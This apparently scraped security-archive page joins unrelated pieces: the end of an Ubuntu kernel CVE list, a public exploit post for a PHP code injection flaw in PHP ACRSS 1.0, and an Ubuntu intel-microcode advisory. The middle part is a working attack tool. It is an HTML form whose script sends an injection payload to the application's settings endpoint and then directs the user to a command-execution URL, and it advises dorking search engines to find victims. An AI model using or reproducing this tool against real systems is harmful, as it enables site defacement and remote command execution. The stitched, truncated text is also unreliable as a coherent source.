CVE-2024-40908, CVE-2024-40911, CVE-2024-40912,  CVE-2024-40914, CVE-2024-40916, CVE-2024-40927, CVE-2024-40929,  CVE-2024-40931, CVE-2024-40932, CVE-2024-40934, CVE-2024-40937,  CVE-2024-40941, CVE-2024-40942, CVE-2024-40943, CVE-2024-40945,  CVE-2024-40954, CVE-2024-40956, CVE-2024-40957, CVE-2024-40958,  CVE-2024-40959, CVE-2024-40960, CVE-2024-40961, CVE-2024-40963,  CVE-2024-40967, CVE-2024-40968, CVE-2024-40970, CVE-2024-40971,  CVE-2024-40974, CVE-2024-40976, CVE-2024-40978, CVE-2024-40980,  CVE-2024-40981, CVE-2024-40983, CVE-2024-40984, CVE-2024-40987,  CVE-2024-40988, CVE-2024-40990, CVE-2024-40994, CVE-2024-40995,  CVE-2024-41000, CVE-2024-41002, CVE-2024-41004, CVE-2024-41005,  CVE-2024-41006, CVE-2024-41007, CVE-2024-41027, CVE-2024-41034,  CVE-2024-41035, CVE-2024-41040, CVE-2024-41041, CVE-2024-41044,  CVE-2024-41046, CVE-2024-41047, CVE-2024-41048, CVE-2024-41049,  CVE-2024-41055, CVE-2024-41087, CVE-2024-41089, CVE-2024-41092,  CVE-2024-41093, CVE-2024-41095, CVE-2024-41097, CVE-2024-42068,  CVE-2024-42070, CVE-2024-42076, CVE-2024-42077, CVE-2024-42080,  CVE-2024-42082, CVE-2024-42084, CVE-2024-42085, CVE-2024-42086,  CVE-2024-42087, CVE-2024-42089, CVE-2024-42090, CVE-2024-42092,  CVE-2024-42093, CVE-2024-42094, CVE-2024-42095, CVE-2024-42096,  CVE-2024-42097, CVE-2024-42098, CVE-2024-42101, CVE-2024-42102,  CVE-2024-42104, CVE-2024-42105, CVE-2024-42106, CVE-2024-42109,  CVE-2024-42115, CVE-2024-42119, CVE-2024-42120, CVE-2024-42121,  CVE-2024-42124, CVE-2024-42127, CVE-2024-42130, CVE-2024-42131,  CVE-2024-42137, CVE-2024-42140, CVE-2024-42145, CVE-2024-42148,  CVE-2024-42152, CVE-2024-42153, CVE-2024-42154, CVE-2024-42157,  CVE-2024-42161, CVE-2024-42223, CVE-2024-42224, CVE-2024-42225,  CVE-2024-42229, CVE-2024-42232, CVE-2024-42236, CVE-2024-42240,  CVE-2024-42244, CVE-2024-42247, CVE-2024-42270Package Information:  https://launchpad.net/ubuntu/+source/linux-azure-fde-5.15/5.15.0-1072.81~20.04.1.1

Ubuntu Security Notice USN-7009-2

PHP ACRSS version 1.0 suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : php acrss 1.0 php code injection Vulnerability                                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-acrss-zip.zip                        |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This code injects the malicious code you want into existing HTML files or creates a new HTML file and injects the payload.

[+] Line 11 Set your file name & payload.

[+] save payload as poc.html

[+] payload :

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title> PHP code injection Tool</title>  
    <script>  
        async function sendRequest() {  
            const url = document.getElementById('url').value;  
            const postData = {  
                'content[welcome]': `Hacked by indoushka`  
            };

            try {  
                const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {  
                    method: 'POST',  
                    headers: {  
                        'Content-Type': 'application/x-www-form-urlencoded'  
                    },  
                    body: new URLSearchParams(postData).toString()  
                });

                if (response.ok) {  
                    document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';

                } else {  
                    document.getElementById('result').innerText = 'Error: ' + response.statusText;  
                }  
            } catch (error) {  
                document.getElementById('result').innerText = 'Error making request: ' + error.message;  
            }  
        }  
    </script>  
</head>  
<body>  
    <h1>Injection Tool</h1>  
    <form onsubmit="event.preventDefault(); sendRequest();">  
        <label for="url">Enter URL:</label>  
        <input type="text" id="url" name="url" required>  
        <button type="submit">Submit</button>  
    </form>  
    <pre id="result"></pre>  
</body>  
</html>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

PHP ACRSS 1.0 Code Injection

Ubuntu Security Notice 7033-1 - It was discovered that some Intel Processors did not properly restrict access to the Running Average Power Limit interface. This may allow a local privileged attacker to obtain sensitive information. It was discovered that some Intel Processors did not properly implement finite state machines in hardware logic. This may allow a local privileged attacker to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-7033-1  
September 25, 2024

intel-microcode vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

Several security issues were fixed in Intel Microcode.

Software Description:  
- intel-microcode: Processor microcode for Intel CPUs

Details:

It was discovered that some Intel(R) Processors did not properly restrict  
access to the Running Average Power Limit (RAPL) interface. This may allow  
a local privileged attacker to obtain sensitive information.  
(CVE-2024-23984)

It was discovered that some Intel(R) Processors did not properly implement  
finite state machines (FSMs) in hardware logic. This may allow a local  
privileged attacker to cause a denial of service (system crash).  
(CVE-2024-24968)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  intel-microcode                 3.20240910.0ubuntu0.24.04.1

Ubuntu 22.04 LTS  
  intel-microcode                 3.20240910.0ubuntu0.22.04.1

Ubuntu 20.04 LTS  
  intel-microcode                 3.20240910.0ubuntu0.20.04.1

Ubuntu 18.04 LTS  
  intel-microcode                 3.20240910.0ubuntu0.18.04.1+esm1  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  intel-microcode                 3.20240910.0ubuntu0.16.04.1+esm1  
                                  Available with Ubuntu Pro

After a standard system update you need to reboot your computer to make  
all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7033-1  
  CVE-2024-23984, CVE-2024-24968

Package Information:  
  https://launchpad.net/ubuntu/+source/intel-microcode/3.20240910.0ubuntu0.24.04.1  
  https://launchpad.net/ubuntu/+source/intel-microcode/3.20240910.0ubuntu0.22.04.1  
  https://launchpad.net/ubuntu/+source/intel-microcode/3.20240910.0ubuntu0.20.04.1

Tag

#vulnerability